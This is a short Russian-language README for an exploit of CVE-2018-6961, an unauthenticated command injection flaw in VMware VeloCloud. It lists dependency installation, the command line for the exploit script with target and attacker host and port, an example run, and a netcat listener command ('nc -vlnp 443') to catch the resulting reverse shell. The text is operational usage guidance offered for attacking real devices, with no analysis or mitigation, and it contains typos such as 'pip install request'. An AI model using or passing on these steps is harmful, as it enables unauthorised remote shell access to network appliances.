
veloCloud VMWare - Уязвимость
CVE-2018-6961 - УЯЗВИМОСТЬ НЕАВТОРИЗОВАННОЙ ИНЪЕКЦИИ КОМАНД
Этот эксплойт работает в Python2.7 — не тестировался на других версиях.
1) Установка зависимостей
pip install request
если pip не установлен, просто выполните
apt-get install python-pip
**2) Использование **
python exployt.py --rhost --interface --lhost --lport --function
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Эксплуатация...................
3) Не забудьте настроить netcat на другом терминале
nc -vlnp 443
TODO — улучшить скрипт для запуска netcat в том же терминале